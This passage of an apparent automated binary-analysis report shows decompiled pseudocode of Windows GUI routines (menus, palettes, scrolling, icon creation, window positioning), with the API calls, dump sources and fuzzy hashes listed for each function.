                                                                                • GetWindowLongA.USER32 ref: 00439E3D
                                                                                • GetWindowLongA.USER32 ref: 00439E5F
                                                                                • SetRect.USER32 ref: 00439E8B
                                                                                • DrawEdge.USER32(?,?,?,00000000), ref: 00439E9A
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439EBF
                                                                                • RestoreDC.GDI32(?,?), ref: 00439F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 2976466617-0
                                                                                • Opcode ID: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction ID: 0a2c6d2463048ccdf29597ec985fa3fb5adccc33b0d18335653a708fa4918e7f
                                                                                • Opcode Fuzzy Hash: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction Fuzzy Hash: 7A416471B001156BDB00EEA9CC81F9E77B8AF48304F10506AFA15EB3C6D67DDD018BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045CC58(void* __eax, void* __edx) {
                                                                                				char _v12;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				signed int _v48;
                                                                                				signed int _v52;
                                                                                				int _t53;
                                                                                				int _t55;
                                                                                				signed int _t60;
                                                                                				signed int _t63;
                                                                                				int _t82;
                                                                                				int _t84;
                                                                                				signed int _t89;
                                                                                				signed int _t92;
                                                                                				void* _t97;
                                                                                				void* _t111;
                                                                                
                                                                                				_t97 = __eax;
                                                                                				if(__edx == 0) {
                                                                                					E0041295C(0, _t111, 0);
                                                                                					E0041295C(1,  &_v12, 1);
                                                                                					SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                                					SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                                					_t53 = E004350E8(_t97);
                                                                                					_t55 = E004350A4(_t97);
                                                                                					SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
                                                                                					_t60 = E004350E8(_t97);
                                                                                					_t63 = E004350A4(_t97);
                                                                                					return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
                                                                                				}
                                                                                				E0041295C(E0041295C(E004350A4(__eax), _t111, 0) | 0xffffffff,  &_v12, 1);
                                                                                				SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                                				SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                                				_t82 = E004350E8(_t97);
                                                                                				_t84 = E004350A4(_t97);
                                                                                				SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
                                                                                				_t89 = E004350E8(_t97);
                                                                                				_t92 = E004350A4(_t97);
                                                                                				return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
                                                                                			}

                                                                                APIs
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CC95
                                                                                • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCB2
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCD5
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD00
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CD36
                                                                                • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045CD53
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD76
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CDA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ModeViewport
                                                                                • String ID:
                                                                                • API String ID: 3149394475-0
                                                                                • Opcode ID: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction ID: e0da8c87a236fb087fc382737a2b647bc55f7f1c6ba116ed6a76608d3ac074bb
                                                                                • Opcode Fuzzy Hash: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction Fuzzy Hash: 8B315E703043016BD744FB7ACC86B9B26989F48308F00593FB996EB2D7CA7DC8894369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E004206FC(void* __ebx) {
                                                                                				struct HDC__* _v8;
                                                                                				struct tagPALETTEENTRY _v1000;
                                                                                				struct tagPALETTEENTRY _v1004;
                                                                                				struct tagPALETTEENTRY _v1032;
                                                                                				signed int _v1034;
                                                                                				short _v1036;
                                                                                				void* _t24;
                                                                                				int _t53;
                                                                                				intOrPtr _t60;
                                                                                				void* _t62;
                                                                                				void* _t63;
                                                                                
                                                                                				_t62 = _t63;
                                                                                				_v1036 = 0x300;
                                                                                				_v1034 = 0x10;
                                                                                				E00402994(_t24, 0x40,  &_v1032);
                                                                                				_v8 = GetDC(0);
                                                                                				_push(_t62);
                                                                                				_push(0x4207f9);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t63 + 0xfffffbf8;
                                                                                				_t53 = GetDeviceCaps(_v8, 0x68);
                                                                                				if(_t53 >= 0x10) {
                                                                                					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
                                                                                					if(_v1004 != 0xc0c0c0) {
                                                                                						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                                                					} else {
                                                                                						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
                                                                                						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                                                						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
                                                                                					}
                                                                                				}
                                                                                				_pop(_t60);
                                                                                				 *[fs:eax] = _t60;
                                                                                				_push(E00420800);
                                                                                				return ReleaseDC(0, _v8);
                                                                                			}















                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0042072A
                                                                                • GetDeviceCaps.GDI32(?,00000068), ref: 00420746
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00420765
                                                                                • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00420789
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 004207A7
                                                                                • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 004207BB
                                                                                • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004207DB
                                                                                • ReleaseDC.USER32 ref: 004207F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                • String ID:
                                                                                • API String ID: 1781840570-0
                                                                                • Opcode ID: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction ID: 88d4aa4338388887b010d1d2673664308c814e5b90057e50378935041044e061
                                                                                • Opcode Fuzzy Hash: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction Fuzzy Hash: D12158F1B40328AADB10DB99CD85F9E73BCDB48704F5104A6F705F61C1D678AE509B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E00445468(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                                                				char _v5;
                                                                                				char _v12;
                                                                                				char _v13;
                                                                                				struct tagMENUITEMINFOA _v61;
                                                                                				char _v68;
                                                                                				intOrPtr _t103;
                                                                                				CHAR* _t109;
                                                                                				char _t115;
                                                                                				short _t149;
                                                                                				void* _t154;
                                                                                				intOrPtr _t161;
                                                                                				intOrPtr _t184;
                                                                                				struct HMENU__* _t186;
                                                                                				int _t190;
                                                                                				void* _t192;
                                                                                				intOrPtr _t193;
                                                                                				void* _t196;
                                                                                				void* _t205;
                                                                                
                                                                                				_t155 = __ecx;
                                                                                				_v68 = 0;
                                                                                				_v12 = 0;
                                                                                				_v5 = __ecx;
                                                                                				_t186 = __edx;
                                                                                				_t154 = __eax;
                                                                                				_push(_t196);
                                                                                				_push(0x4456c3);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t196 + 0xffffffc0;
                                                                                				if( *((char*)(__eax + 0x3e)) == 0) {
                                                                                					L22:
                                                                                					_pop(_t161);
                                                                                					 *[fs:eax] = _t161;
                                                                                					_push(0x4456ca);
                                                                                					E00404320( &_v68);
                                                                                					return E00404320( &_v12);
                                                                                				}
                                                                                				E004043B8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                                                				if(E004472A4(_t154) <= 0) {
                                                                                					__eflags =  *((short*)(_t154 + 0x60));
                                                                                					if( *((short*)(_t154 + 0x60)) == 0) {
                                                                                						L8:
                                                                                						if((GetVersion() & 0x000000ff) < 4) {
                                                                                							_t190 =  *(0x46baa0 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0046BA94 |  *0x0046BA84 |  *0x0046BA8C | 0x00000400;
                                                                                							_t103 = E004472A4(_t154);
                                                                                							__eflags = _t103;
                                                                                							if(_t103 <= 0) {
                                                                                								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047D0(_v12));
                                                                                							} else {
                                                                                								_t109 = E004047D0( *((intOrPtr*)(_t154 + 0x30)));
                                                                                								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044596C(_t154), _t109);
                                                                                							}
                                                                                							goto L22;
                                                                                						}
                                                                                						_v61.cbSize = 0x2c;
                                                                                						_v61.fMask = 0x3f;
                                                                                						_t192 = E00447860(_t154);
                                                                                						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00446E7C(_t154) == 0) {
                                                                                							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                                                								L14:
                                                                                								_t115 = 0;
                                                                                								goto L16;
                                                                                							}
                                                                                							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                                                							if(_t205 == 0) {
                                                                                								goto L15;
                                                                                							}
                                                                                							goto L14;
                                                                                						} else {
                                                                                							L15:
                                                                                							_t115 = 1;
                                                                                							L16:
                                                                                							_v13 = _t115;
                                                                                							_v61.fType =  *(0x46bad4 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0046BACC |  *0x0046BAA8 |  *0x0046BADC |  *0x0046BAE4;
                                                                                							_v61.fState =  *0x0046BAB4 |  *0x0046BAC4 |  *0x0046BABC;
                                                                                							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                                                							_v61.hSubMenu = 0;
                                                                                							_v61.hbmpChecked = 0;
                                                                                							_v61.hbmpUnchecked = 0;
                                                                                							_v61.dwTypeData = E004047D0(_v12);
                                                                                							if(E004472A4(_t154) > 0) {
                                                                                								_v61.hSubMenu = E0044596C(_t154);
                                                                                							}
                                                                                							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                                                							goto L22;
                                                                                						}
                                                                                					}
                                                                                					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                                                					__eflags = _t193;
                                                                                					if(_t193 == 0) {
                                                                                						L7:
                                                                                						_push(_v12);
                                                                                						_push(0x4456dc);
                                                                                						E00444ACC( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                                                						_push(_v68);
                                                                                						E00404698();
                                                                                						goto L8;
                                                                                					}
                                                                                					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                                                					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                                                						goto L7;
                                                                                					}
                                                                                					_t184 =  *0x44435c; // 0x4443a8
                                                                                					_t149 = E00403740( *((intOrPtr*)(_t193 + 4)), _t184);
                                                                                					__eflags = _t149;
                                                                                					if(_t149 != 0) {
                                                                                						goto L8;
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                				_v61.hSubMenu = E0044596C(_t154);
                                                                                				goto L8;
                                                                                			}





















                                                                                0x004454ff
                                                                                0x00000000
                                                                                0x004454ff
                                                                                0x004454c8
                                                                                0x004454cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004454d1
                                                                                0x004454d7
                                                                                0x004454dc
                                                                                0x004454de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004454de
                                                                                0x004454b5
                                                                                0x00000000

                                                                                APIs
                                                                                • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00445614
                                                                                • GetVersion.KERNEL32(00000000,004456C3), ref: 00445504
                                                                                  • Part of subcall function 0044596C: CreatePopupMenu.USER32(?,0044567F,00000000,00000000,004456C3), ref: 00445987
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$CreateInsertItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 133695497-2308483597
                                                                                • Opcode ID: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction ID: 3d737bce33b9b63eca678c529a0aeb9621d3b228851bcedd8045e0118eaffb15
                                                                                • Opcode Fuzzy Hash: 3988cf044ec6df4286f32fd7ac8835f7c3f34a54fe678dbaec8ea00de5f63395
                                                                                • Instruction Fuzzy Hash: 7A611270A006449BEF10EFB9D88166E7BF6AF49304F45407AE944E7397E738D845C748
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E0045E014(void* __eax, int __ecx, signed int __edx, char _a4) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				struct tagRECT _v28;
                                                                                				char _v44;
                                                                                				int _t90;
                                                                                				void* _t112;
                                                                                				void* _t125;
                                                                                				void* _t131;
                                                                                				intOrPtr _t142;
                                                                                				int _t143;
                                                                                
                                                                                				_t143 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t125 = __eax;
                                                                                				_t2 =  &_a4; // 0x45e1e1
                                                                                				_t142 =  *_t2;
                                                                                				_v12 = 2;
                                                                                				if( *((char*)(__eax + 0x28c)) == 0) {
                                                                                					_v12 = _v12 | 0x00000004;
                                                                                				}
                                                                                				_t147 = _t143;
                                                                                				if(_t143 != 0) {
                                                                                					__eflags = _v8;
                                                                                					if(__eflags != 0) {
                                                                                						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x34)));
                                                                                						ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                                						__eflags = 0;
                                                                                						E00412984(0,  *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                                						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                                					} else {
                                                                                						E00412984(0,  *((intOrPtr*)(_t142 + 0xc)),  *((intOrPtr*)(_t142 + 0x34)),  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						_t90 = ScrollWindowEx(E0043BD14(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
                                                                                					}
                                                                                				} else {
                                                                                					if(E004037B0(_t125, _t147) != 0) {
                                                                                						_push( *((intOrPtr*)(_t142 + 0x3c)));
                                                                                						_push( &_v28);
                                                                                						_push(E004350A4(_t125) -  *((intOrPtr*)(_t142 + 4)));
                                                                                						_t112 = E004350A4(_t125);
                                                                                						__eflags = 0;
                                                                                						_pop(_t131);
                                                                                						E00412984(_t112 -  *((intOrPtr*)(_t142 + 0xc)), _t131, 0);
                                                                                						_v8 =  ~_v8;
                                                                                					} else {
                                                                                						E00412984( *((intOrPtr*)(_t142 + 4)),  *((intOrPtr*)(_t142 + 0xc)), 0,  &_v28,  *((intOrPtr*)(_t142 + 0x3c)));
                                                                                					}
                                                                                					_t90 = ScrollWindowEx(E0043BD14(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
                                                                                				}
                                                                                				_t149 =  *(_t125 + 0x249) & 0x00000010;
                                                                                				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
                                                                                					return _t90;
                                                                                				} else {
                                                                                					E0045F820(_t125,  &_v44);
                                                                                					return E0045D710(_t125,  &_v44, _t149);
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ScrollWindow
                                                                                • String ID: E
                                                                                • API String ID: 2126015319-2089609516
                                                                                • Opcode ID: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction ID: 59567550c3053fb61c417f11c068a5971746d9c38f0f71f24a54f4a7561ce20a
                                                                                • Opcode Fuzzy Hash: a5590fd15d7490c7741a77b52d45b22a4dfcd2a404514be6f2ab8c321c5b2fcc
                                                                                • Instruction Fuzzy Hash: 3D510071A00509BBDB04DA99CD82FEFB7ACEF48304F405126BA05E7681CB78E955CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00420CEC() {
                                                                                				struct HINSTANCE__* _t145;
                                                                                				long _t166;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t186;
                                                                                				void* _t192;
                                                                                				BYTE* _t193;
                                                                                				BYTE* _t196;
                                                                                				intOrPtr _t197;
                                                                                				void* _t198;
                                                                                				intOrPtr _t199;
                                                                                
                                                                                				 *((intOrPtr*)(_t198 - 0x24)) = 0;
                                                                                				 *((intOrPtr*)(_t198 - 0x20)) = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
                                                                                				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
                                                                                				if(_t192 > 0) {
                                                                                					_t197 = 1;
                                                                                					do {
                                                                                						_t167 = E00420B60( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
                                                                                						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E00420B6C( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
                                                                                							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
                                                                                							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
                                                                                						}
                                                                                						_t197 = _t197 + 1;
                                                                                						_t192 = _t192 - 1;
                                                                                						_t204 = _t192;
                                                                                					} while (_t192 != 0);
                                                                                				}
                                                                                				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
                                                                                				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
                                                                                				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
                                                                                				 *((intOrPtr*)(_t198 - 0x2c)) = E00408330(( *(_t198 - 0x40))[8], _t204);
                                                                                				 *[fs:eax] = _t199;
                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x420ed3, _t198);
                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
                                                                                				E004209A4( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
                                                                                				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
                                                                                				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
                                                                                				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
                                                                                				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
                                                                                				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
                                                                                				 *(_t198 - 0x30) = E00408330( *((intOrPtr*)(_t198 - 0x18)), _t204);
                                                                                				_push(_t198);
                                                                                				_push(0x420eb0);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t199;
                                                                                				_t193 =  *(_t198 - 0x30);
                                                                                				_t196 =  &(( *(_t198 - 0x30))[_t166]);
                                                                                				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
                                                                                				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
                                                                                				DeleteObject( *(_t198 - 0x34));
                                                                                				DeleteObject( *(_t198 - 0x38));
                                                                                				_t145 =  *0x487714; // 0x400000
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
                                                                                					E00420114(_t166);
                                                                                				}
                                                                                				_pop(_t186);
                                                                                				 *[fs:eax] = _t186;
                                                                                				_push(E00420EB7);
                                                                                				return E0040274C( *(_t198 - 0x30));
                                                                                			}


                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DDE
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00420DED
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E3E
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 00420E4C
                                                                                • DeleteObject.GDI32(?), ref: 00420E55
                                                                                • DeleteObject.GDI32(?), ref: 00420E5E
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420E80
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction ID: d2be98027a47b0f60a69fa7761058e0b512e7efa375e76c795a88d23bc60e875
                                                                                • Opcode Fuzzy Hash: e9eab2e68ea044c9ea156f889c624f8d8221665ec8abac608e602645b7b127a8
                                                                                • Instruction Fuzzy Hash: F1610671A00218AFCB00DFA9D881AAEBBF9FF49304B514466F804FB352D739AD51CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E0043D260(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _v8;
                                                                                				void _v12;
                                                                                				intOrPtr _v16;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v36;
                                                                                				intOrPtr _t85;
                                                                                				void* _t113;
                                                                                				intOrPtr _t129;
                                                                                				intOrPtr _t138;
                                                                                				void* _t141;
                                                                                
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_t113 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_t138 =  *0x486dac; // 0x487c00
                                                                                				 *((char*)(_v8 + 0x210)) = 1;
                                                                                				_push(_t141);
                                                                                				_push(0x43d427);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t141 + 0xffffffe0;
                                                                                				E004356D0(_v8, __ecx, __ecx, _t138);
                                                                                				_v16 = _v16 + 4;
                                                                                				E004368EC(_v8,  &_v28);
                                                                                				if(E004531E8() <  *(_v8 + 0x4c) + _v24) {
                                                                                					_v24 = E004531E8() -  *(_v8 + 0x4c);
                                                                                				}
                                                                                				if(E004531F4() <  *(_v8 + 0x48) + _v28) {
                                                                                					_v28 = E004531F4() -  *(_v8 + 0x48);
                                                                                				}
                                                                                				if(E004531DC() > _v28) {
                                                                                					_v28 = E004531DC();
                                                                                				}
                                                                                				if(E004531D0() > _v16) {
                                                                                					_v16 = E004531D0();
                                                                                				}
